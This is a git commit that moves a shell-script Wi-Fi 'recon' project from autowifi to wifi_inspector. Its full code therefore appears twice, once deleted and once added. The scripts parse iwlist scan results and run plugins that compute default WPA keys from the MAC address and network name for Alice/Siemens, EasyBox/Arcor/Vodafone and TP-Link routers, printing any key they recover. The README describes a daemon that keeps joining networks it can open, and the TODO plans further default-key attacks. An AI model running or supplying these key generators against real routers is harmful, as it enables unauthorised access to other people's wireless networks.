From 3a7a49b9bda4b2df849db827c61aa347a68a96be Mon Sep 17 00:00:00 2001 
From: lassulus
Date: Mon, 22 Dec 2014 20:09:43 +0100
Subject: wifi_inspector > autowifi (better name anyuway)
---
 recon/autowifi/.gitignore | 1 -
 recon/autowifi/README.md | 49 ---------------------
 recon/autowifi/TODO | 9 ----
 recon/autowifi/inspector_wifi | 75 --------------------------------
 recon/autowifi/plugins/01open | 6 ---
 recon/autowifi/plugins/02alice | 20 ---------
 recon/autowifi/plugins/02easybox | 37 ----------------
 recon/autowifi/plugins/02tplink | 17 --------
 recon/autowifi/plugins/plugin_core | 41 -----------------
 recon/wifi_inspector/.gitignore | 1 +
 recon/wifi_inspector/README.md | 49 +++++++++++++++++++++
 recon/wifi_inspector/TODO | 9 ++++
 recon/wifi_inspector/inspector_wifi | 75 ++++++++++++++++++++++++++++++++
 recon/wifi_inspector/plugins/01open | 6 +++
 recon/wifi_inspector/plugins/02alice | 20 +++++++++
 recon/wifi_inspector/plugins/02easybox | 37 ++++++++++++++++
 recon/wifi_inspector/plugins/02tplink | 17 ++++++++
 recon/wifi_inspector/plugins/plugin_core | 41 +++++++++++++++++
 18 files changed, 255 insertions(+), 255 deletions(-)
 delete mode 100644 recon/autowifi/.gitignore
 delete mode 100644 recon/autowifi/README.md
 delete mode 100644 recon/autowifi/TODO
 delete mode 100755 recon/autowifi/inspector_wifi
 delete mode 100755 recon/autowifi/plugins/01open
 delete mode 100755 recon/autowifi/plugins/02alice
 delete mode 100755 recon/autowifi/plugins/02easybox
 delete mode 100755 recon/autowifi/plugins/02tplink
 delete mode 100644 recon/autowifi/plugins/plugin_core
 create mode 100644 recon/wifi_inspector/.gitignore
 create mode 100644 recon/wifi_inspector/README.md
 create mode 100644 recon/wifi_inspector/TODO
 create mode 100755 recon/wifi_inspector/inspector_wifi
 create mode 100755 recon/wifi_inspector/plugins/01open
 create mode 100755 recon/wifi_inspector/plugins/02alice
 create mode 100755 recon/wifi_inspector/plugins/02easybox
 create mode 100755 recon/wifi_inspector/plugins/02tplink
 create mode 100644 recon/wifi_inspector/plugins/plugin_core
(limited to 'recon')
diff --git a/recon/autowifi/.gitignore b/recon/autowifi/.gitignore
deleted file mode 100644
index 05ba1603..00000000
--- a/recon/autowifi/.gitignore
+++ /dev/null
@@ -1 +0,0 @@
-/etc/autowifi/wifi_keys
diff --git a/recon/autowifi/README.md b/recon/autowifi/README.md
deleted file mode 100644
index 3e0d8dce..00000000
--- a/recon/autowifi/README.md
+++ /dev/null
@@ -1,49 +0,0 @@
-# Autowifi
-Author: makefu,lassulus
-
-Status: Pre-Alpha - it will most likely break if you try to use it
-
-# Contact
-
-twitter: @krebsbob ,@makefoo
-
-IRC: freenode #krebs
-
-# Goals
-Goal of autowifi is to provide a tool which automatically can connect to
-networks in an unknown environment.
-
-This can either be done by connecting to open networks, known networks
-(whitelist) or by calculating weak default wpa keys (for example easybox
-default passwords).
-
-# Audience
-Due to the current status of the project the target audience are
-linux users with technical background .
-
-# Usage
-
- # all as root
- # try to find networks to connect to around you
- usr/bin/autowifi_dryrun quiet
-
- # start the autowifi daemon which tries to stay in networks all the time
- usr/bin/autowifi
-
-# Plugins
-All tests to open up networks are implemented in plugins in
- usr/lib/autowifi/plugins
-
-## Run a single Plugin
-This can be used for testing purposes, e.g. test a single plugin against given networks directly
-
- # try out the easybox keygen
- usr/lib/autowifi/plugins/02easybox SSID MAC CHANNEL ENCRYPTION(wpa_cli style)
-
- #e.g.
- usr/lib/autowifi/plugins/02easybox Easybox-123456 00:11:22:33:44:55 7 "[wpa]"
-
-# Disclaimer
-- use at own risk
-- only run in lab environment
-- you break it, you buy it
diff --git a/recon/autowifi/TODO b/recon/autowifi/TODO
deleted file mode 100644
index ddd59818..00000000
--- a/recon/autowifi/TODO
+++ /dev/null
@@ -1,9 +0,0 @@
-more intelligent autoconnect (open first, encrypted second etc.)
- perform initial scan on startup of unscanned networks
- sort networks by bandwidth and connect
-profiles ala netcfg/netctl
-better profile hooks
-
-Implement:
- - Droid Default WPA2 Pass for HotSpot: CVE-2013-4622: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4622
- - EasyBox 802/803 default WPS Pin: http://packetstormsecurity.com/files/122698/SA-20130805-0.txt
diff --git a/recon/autowifi/inspector_wifi b/recon/autowifi/inspector_wifi
deleted file mode 100755
index 06f37ddb..00000000
--- a/recon/autowifi/inspector_wifi
+++ /dev/null
@@ -1,75 +0,0 @@
-#!/bin/sh
-# Usage; sudo iwlist wlan0 scan | ./inspector_wifi
-#
-#
-set -eu
-
-cd "$(dirname "$(readlink -f "$0")")"
-echo "waiting for iwlist scan data..." >&2
-
-crack_wifi(){
- for i in plugins/*;do
- if RET=$(./$i "$@" 2>/dev/null);then
- echo "$@ - with crack $i succeeded - Key is $RET"
- fi
- done
-}
-
-shell_escape(){
- sed 's/./\\&/g'
-}
-remove_quotes(){
- sed 's/^"\|"$//g'
-}
-
-
-iwlist_scan_parser(){
- count=0
- while read line;
- do
- case "$line" in
-
- *"Cell "*)
- if [ $count -ne 0 ];then
- crack_wifi "$ESSID" $MAC $CHANNEL any_encryption
- fi
- WPA=0
- WPA2=0
- : $((count+=1))
- MAC=${line#*Address: }
- ;;
- *Channel:*)
- CHANNEL=${line#*:}
- ;;
- *Quality=*)
- QUALITY="`printf '%s' ${line#*Quality=} | cut -d/ -f 1`"
- ;;
- *"Encryption key:"*)
- ENCRYPTION=${line#*key:}
- ;;
- *ESSID:*)
- ESSID=$(echo "${line#*ESSID:}" | remove_quotes)
- ;;
- *"IE: IEEE 802.11i/WPA2"*)
- WPA2=1
- ;;
- *"IE: WPA Version 1"*)
- WPA=1
- ;;
- *);; #important, do not delete!
- esac
- done;
- crack_wifi "$ESSID" $MAC $CHANNEL any_encryption
- echo WIFI_COUNT=$count
-}
-
-wifi_init(){
- iwlist_scan_parser
-}
-
-loop_networks(){
- for i in `seq 1 $WIFI_COUNT`; do
- loop_over_cracks "$i"
- done
-}
-wifi_init
diff --git a/recon/autowifi/plugins/01open b/recon/autowifi/plugins/01open
deleted file mode 100755
index 881f47ea..00000000
--- a/recon/autowifi/plugins/01open
+++ /dev/null
@@ -1,6 +0,0 @@
-#!/bin/sh
-#ESSID MAC CHANNEL ENCRYPTION
-if [ "$4" == "[ESS]" ]; then
- exit 0
-fi
-exit 1
diff --git a/recon/autowifi/plugins/02alice b/recon/autowifi/plugins/02alice
deleted file mode 100755
index 65ab34b1..00000000
--- a/recon/autowifi/plugins/02alice
+++ /dev/null
@@ -1,20 +0,0 @@
-#!/bin/sh
-# Implementation of Alicebox 1121 /Siemens S1621-Z220-A Default Password Algorithm:
-# Based on Poc from
-# http://www.wardriving-forum.de/forum/f275/standard-wlanpassw%F6rter-von-alice-boxen-70287.html
-#
-#
-# ESSID MAC CHANNEL ENCRYPTION
-
-cd $(dirname $(readlink -f $0))
-. ./plugin_core
-
-parse_plugin_args "$@"
-
-! check_vendor_mac $VENDOR_MAC "00255E" && echo "$VENDOR_MAC not affected" && exit 1
-
-# printf always makes string to lower, need that for correct md5sum
-ETHMAC=$( printf "%012x" $((0x${MAC}-1)) )
-TMP=$(printf $ETHMAC | md5sum)
-printf ${TMP:0:12} | base64
-exit 0
diff --git a/recon/autowifi/plugins/02easybox b/recon/autowifi/plugins/02easybox
deleted file mode 100755
index 3bb1ee86..00000000
--- a/recon/autowifi/plugins/02easybox
+++ /dev/null
@@ -1,37 +0,0 @@
-#!/bin/sh
-#ESSID MAC CHANNEL ENCRYPTION WPA WPA2
-
-cd $(dirname $(readlink -f $0))
-. ./plugin_core
-parse_plugin_args "$@"
-
-if ! echo "$ESSID" | egrep -i "(EasyBox-|Arcor-|Vodafone-)" >/dev/null; then
- echo "Essid $ESSID is not Default EasyBox|Arcor|Vodafone"
- exit 1
-else
-
- # Fill up to 4 places with zeros, if necessary:
- deci=$(printf "%04d" "0x${MAC:8:4}" | sed 's/.*\(....\)/\1/;s/./& /g')
- #
- # The digits M9 to M12 are just the last digits (9.-12.) of the MAC:
- hexi=$(echo ${MAC:8:4} | sed 's/./& /g')
- #echo 'M4 (Hex): ' ${hexi[@]}
- # K1 = last byte of (d0 + d1 + h2 + h3)
- # K2 = last byte of (h0 + h1 + d2 + d3)
- c1=$(printf "%d + %d + %d + %d" ${deci:0:1} ${deci:2:1} 0x${hexi:4:1} 0x${hexi:6:1})
- c2=$(printf "%d + %d + %d + %d" 0x${hexi:0:1} 0x${hexi:2:1} ${deci:4:1} ${deci:6:1})
- K1=$((($c1)%16))
- K2=$((($c2)%16))
- #printf "K1: %x\n" $K1
- #printf "K2: %x\n" $K2
- X1=$((K1^${deci:6:1}))
- X2=$((K1^${deci:4:1}))
- X3=$((K1^${deci:2:1}))
- Y1=$((K2^0x${hexi:2:1}))
- Y2=$((K2^0x${hexi:4:1}))
- Y3=$((K2^0x${hexi:6:1}))
- Z1=$((0x${hexi:4:1}^${deci:6:1}))
- Z2=$((0x${hexi:6:1}^${deci:4:1}))
- Z3=$((K1^K2))
- printf "%x%x%x%x%x%x%x%x%x\n" $X1 $Y1 $Z1 $X2 $Y2 $Z2 $X3 $Y3 $Z3 | tr a-f A-F
-fi
diff --git a/recon/autowifi/plugins/02tplink b/recon/autowifi/plugins/02tplink
deleted file mode 100755
index 751ec209..00000000
--- a/recon/autowifi/plugins/02tplink
+++ /dev/null
@@ -1,17 +0,0 @@
-#!/bin/sh
-# Implementation of TP-Link default WPA Key
-# Based on
-# http://www.wardriving-forum.de/forum/f321/ezwlan-android-2-1-a-70045-4.html#post342481
-
-cd $(dirname $(readlink -f $0))
-. ./plugin_core
-
-parse_plugin_args "$@"
-
-! check_vendor_mac $VENDOR_MAC "F8D111" && echo "$VENDOR_MAC not affected" && exit 1
-! echo $ESSID | egrep -q '^tp' && echo "$ESSID not affected" && exit 1
-
-
-# printf always makes string to lower, need that for correct md5sum
-printf ${MAC:4:12}
-exit 0
diff --git a/recon/autowifi/plugins/plugin_core b/recon/autowifi/plugins/plugin_core
deleted file mode 100644
index e79a3c05..00000000
--- a/recon/autowifi/plugins/plugin_core
+++ /dev/null
@@ -1,41 +0,0 @@
-#!/bin/sh
-parse_plugin_args(){
- [ $# -ne 4 ] && plugin_usage && exit 1
- # convenience function to put args in ENV variables
- ESSID="$1"
-
- # mac is returned without colon
- MAC=$(printf "%s" "$2" | sed 's/://g')
- # split up the mac address to vendor and private part
- VENDOR_MAC=${MAC:0:6}
- PRIVATE_MAC=${MAC:6:12}
- CHANNEL="$3"
- ENC="$4"
- if [ ${#MAC} -ne 12 ] ;then
- echo "MAC malformed"
- exit 1
- fi
-}
-plugin_usage(){
- cat << EOF
-usage: $0 ESSID MAC CHANNEL ENC"
-
- ESSID - string
- MAC - 00:11:22:33:44:55
- CHANNEL - 4
- ENC - wpa
-EOF
-
-}
-
-check_vendor_mac(){
- needle="$(printf $1 | tr '[A-Z]' '[a-z]')"
- shift
- for i in "$@";do
- [ "$needle" == "$(printf $i | tr '[A-Z]' '[a-z]')" ] && return 0
- done
- return 1
-}
-check_painmode(){
- test -z "${painmode:-}" && echo "painmode required" && exit 1
-}
diff --git a/recon/wifi_inspector/.gitignore b/recon/wifi_inspector/.gitignore
new file mode 100644
index 00000000..05ba1603
--- /dev/null
+++ b/recon/wifi_inspector/.gitignore
@@ -0,0 +1 @@
+/etc/autowifi/wifi_keys
diff --git a/recon/wifi_inspector/README.md b/recon/wifi_inspector/README.md
new file mode 100644
index 00000000..3e0d8dce
--- /dev/null
+++ b/recon/wifi_inspector/README.md
@@ -0,0 +1,49 @@
+# Autowifi
+Author: makefu,lassulus
+
+Status: Pre-Alpha - it will most likely break if you try to use it
+
+# Contact
+
+twitter: @krebsbob ,@makefoo
+
+IRC: freenode #krebs
+
+# Goals
+Goal of autowifi is to provide a tool which automatically can connect to
+networks in an unknown environment.
+
+This can either be done by connecting to open networks, known networks
+(whitelist) or by calculating weak default wpa keys (for example easybox
+default passwords).
+
+# Audience
+Due to the current status of the project the target audience are
+linux users with technical background .
+
+# Usage
+
+ # all as root
+ # try to find networks to connect to around you
+ usr/bin/autowifi_dryrun quiet
+
+ # start the autowifi daemon which tries to stay in networks all the time
+ usr/bin/autowifi
+
+# Plugins
+All tests to open up networks are implemented in plugins in
+ usr/lib/autowifi/plugins
+
+## Run a single Plugin
+This can be used for testing purposes, e.g. test a single plugin against given networks directly
+
+ # try out the easybox keygen
+ usr/lib/autowifi/plugins/02easybox SSID MAC CHANNEL ENCRYPTION(wpa_cli style)
+
+ #e.g.
+ usr/lib/autowifi/plugins/02easybox Easybox-123456 00:11:22:33:44:55 7 "[wpa]"
+
+# Disclaimer
+- use at own risk
+- only run in lab environment
+- you break it, you buy it
diff --git a/recon/wifi_inspector/TODO b/recon/wifi_inspector/TODO
new file mode 100644
index 00000000..ddd59818
--- /dev/null
+++ b/recon/wifi_inspector/TODO
@@ -0,0 +1,9 @@
+more intelligent autoconnect (open first, encrypted second etc.)
+ perform initial scan on startup of unscanned networks
+ sort networks by bandwidth and connect
+profiles ala netcfg/netctl
+better profile hooks
+
+Implement:
+ - Droid Default WPA2 Pass for HotSpot: CVE-2013-4622: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4622
+ - EasyBox 802/803 default WPS Pin: http://packetstormsecurity.com/files/122698/SA-20130805-0.txt
diff --git a/recon/wifi_inspector/inspector_wifi b/recon/wifi_inspector/inspector_wifi
new file mode 100755
index 00000000..06f37ddb
--- /dev/null
+++ b/recon/wifi_inspector/inspector_wifi
@@ -0,0 +1,75 @@
+#!/bin/sh
+# Usage; sudo iwlist wlan0 scan | ./inspector_wifi
+#
+#
+set -eu
+
+cd "$(dirname "$(readlink -f "$0")")"
+echo "waiting for iwlist scan data..." >&2
+
+crack_wifi(){
+ for i in plugins/*;do
+ if RET=$(./$i "$@" 2>/dev/null);then
+ echo "$@ - with crack $i succeeded - Key is $RET"
+ fi
+ done
+}
+
+shell_escape(){
+ sed 's/./\\&/g'
+}
+remove_quotes(){
+ sed 's/^"\|"$//g'
+}
+
+
+iwlist_scan_parser(){
+ count=0
+ while read line;
+ do
+ case "$line" in
+
+ *"Cell "*)
+ if [ $count -ne 0 ];then
+ crack_wifi "$ESSID" $MAC $CHANNEL any_encryption
+ fi
+ WPA=0
+ WPA2=0
+ : $((count+=1))
+ MAC=${line#*Address: }
+ ;;
+ *Channel:*)
+ CHANNEL=${line#*:}
+ ;;
+ *Quality=*)
+ QUALITY="`printf '%s' ${line#*Quality=} | cut -d/ -f 1`"
+ ;;
+ *"Encryption key:"*)
+ ENCRYPTION=${line#*key:}
+ ;;
+ *ESSID:*)
+ ESSID=$(echo "${line#*ESSID:}" | remove_quotes)
+ ;;
+ *"IE: IEEE 802.11i/WPA2"*)
+ WPA2=1
+ ;;
+ *"IE: WPA Version 1"*)
+ WPA=1
+ ;;
+ *);; #important, do not delete!
+ esac
+ done;
+ crack_wifi "$ESSID" $MAC $CHANNEL any_encryption
+ echo WIFI_COUNT=$count
+}
+
+wifi_init(){
+ iwlist_scan_parser
+}
+
+loop_networks(){
+ for i in `seq 1 $WIFI_COUNT`; do
+ loop_over_cracks "$i"
+ done
+}
+wifi_init
diff --git a/recon/wifi_inspector/plugins/01open b/recon/wifi_inspector/plugins/01open
new file mode 100755
index 00000000..881f47ea
--- /dev/null
+++ b/recon/wifi_inspector/plugins/01open
@@ -0,0 +1,6 @@
+#!/bin/sh
+#ESSID MAC CHANNEL ENCRYPTION
+if [ "$4" == "[ESS]" ]; then
+ exit 0
+fi
+exit 1
diff --git a/recon/wifi_inspector/plugins/02alice b/recon/wifi_inspector/plugins/02alice
new file mode 100755
index 00000000..65ab34b1
--- /dev/null
+++ b/recon/wifi_inspector/plugins/02alice
@@ -0,0 +1,20 @@
+#!/bin/sh
+# Implementation of Alicebox 1121 /Siemens S1621-Z220-A Default Password Algorithm:
+# Based on Poc from
+# http://www.wardriving-forum.de/forum/f275/standard-wlanpassw%F6rter-von-alice-boxen-70287.html
+#
+#
+# ESSID MAC CHANNEL ENCRYPTION
+
+cd $(dirname $(readlink -f $0))
+. ./plugin_core
+
+parse_plugin_args "$@"
+
+! check_vendor_mac $VENDOR_MAC "00255E" && echo "$VENDOR_MAC not affected" && exit 1
+
+# printf always makes string to lower, need that for correct md5sum
+ETHMAC=$( printf "%012x" $((0x${MAC}-1)) )
+TMP=$(printf $ETHMAC | md5sum)
+printf ${TMP:0:12} | base64
+exit 0
diff --git a/recon/wifi_inspector/plugins/02easybox b/recon/wifi_inspector/plugins/02easybox
new file mode 100755
index 00000000..3bb1ee86
--- /dev/null
+++ b/recon/wifi_inspector/plugins/02easybox
@@ -0,0 +1,37 @@
+#!/bin/sh
+#ESSID MAC CHANNEL ENCRYPTION WPA WPA2
+
+cd $(dirname $(readlink -f $0))
+. ./plugin_core
+parse_plugin_args "$@"
+
+if ! echo "$ESSID" | egrep -i "(EasyBox-|Arcor-|Vodafone-)" >/dev/null; then
+ echo "Essid $ESSID is not Default EasyBox|Arcor|Vodafone"
+ exit 1
+else
+
+ # Fill up to 4 places with zeros, if necessary:
+ deci=$(printf "%04d" "0x${MAC:8:4}" | sed 's/.*\(....\)/\1/;s/./& /g')
+ #
+ # The digits M9 to M12 are just the last digits (9.-12.) of the MAC:
+ hexi=$(echo ${MAC:8:4} | sed 's/./& /g')
+ #echo 'M4 (Hex): ' ${hexi[@]}
+ # K1 = last byte of (d0 + d1 + h2 + h3)
+ # K2 = last byte of (h0 + h1 + d2 + d3)
+ c1=$(printf "%d + %d + %d + %d" ${deci:0:1} ${deci:2:1} 0x${hexi:4:1} 0x${hexi:6:1})
+ c2=$(printf "%d + %d + %d + %d" 0x${hexi:0:1} 0x${hexi:2:1} ${deci:4:1} ${deci:6:1})
+ K1=$((($c1)%16))
+ K2=$((($c2)%16))
+ #printf "K1: %x\n" $K1
+ #printf "K2: %x\n" $K2
+ X1=$((K1^${deci:6:1}))
+ X2=$((K1^${deci:4:1}))
+ X3=$((K1^${deci:2:1}))
+ Y1=$((K2^0x${hexi:2:1}))
+ Y2=$((K2^0x${hexi:4:1}))
+ Y3=$((K2^0x${hexi:6:1}))
+ Z1=$((0x${hexi:4:1}^${deci:6:1}))
+ Z2=$((0x${hexi:6:1}^${deci:4:1}))
+ Z3=$((K1^K2))
+ printf "%x%x%x%x%x%x%x%x%x\n" $X1 $Y1 $Z1 $X2 $Y2 $Z2 $X3 $Y3 $Z3 | tr a-f A-F
+fi
diff --git a/recon/wifi_inspector/plugins/02tplink b/recon/wifi_inspector/plugins/02tplink
new file mode 100755
index 00000000..751ec209
--- /dev/null
+++ b/recon/wifi_inspector/plugins/02tplink
@@ -0,0 +1,17 @@
+#!/bin/sh
+# Implementation of TP-Link default WPA Key
+# Based on
+# http://www.wardriving-forum.de/forum/f321/ezwlan-android-2-1-a-70045-4.html#post342481
+
+cd $(dirname $(readlink -f $0))
+. ./plugin_core
+
+parse_plugin_args "$@"
+
+! check_vendor_mac $VENDOR_MAC "F8D111" && echo "$VENDOR_MAC not affected" && exit 1
+! echo $ESSID | egrep -q '^tp' && echo "$ESSID not affected" && exit 1
+
+
+# printf always makes string to lower, need that for correct md5sum
+printf ${MAC:4:12}
+exit 0
diff --git a/recon/wifi_inspector/plugins/plugin_core b/recon/wifi_inspector/plugins/plugin_core
new file mode 100644
index 00000000..e79a3c05
--- /dev/null
+++ b/recon/wifi_inspector/plugins/plugin_core
@@ -0,0 +1,41 @@
+#!/bin/sh
+parse_plugin_args(){
+ [ $# -ne 4 ] && plugin_usage && exit 1
+ # convenience function to put args in ENV variables
+ ESSID="$1"
+
+ # mac is returned without colon
+ MAC=$(printf "%s" "$2" | sed 's/://g')
+ # split up the mac address to vendor and private part
+ VENDOR_MAC=${MAC:0:6}
+ PRIVATE_MAC=${MAC:6:12}
+ CHANNEL="$3"
+ ENC="$4"
+ if [ ${#MAC} -ne 12 ] ;then
+ echo "MAC malformed"
+ exit 1
+ fi
+}
+plugin_usage(){
+ cat << EOF
+usage: $0 ESSID MAC CHANNEL ENC"
+
+ ESSID - string
+ MAC - 00:11:22:33:44:55
+ CHANNEL - 4
+ ENC - wpa
+EOF
+
+}
+
+check_vendor_mac(){
+ needle="$(printf $1 | tr '[A-Z]' '[a-z]')"
+ shift
+ for i in "$@";do
+ [ "$needle" == "$(printf $i | tr '[A-Z]' '[a-z]')" ] && return 0
+ done
+ return 1
+}
+check_painmode(){
+ test -z "${painmode:-}" && echo "painmode required" && exit 1
+}
--
cgit v1.2.3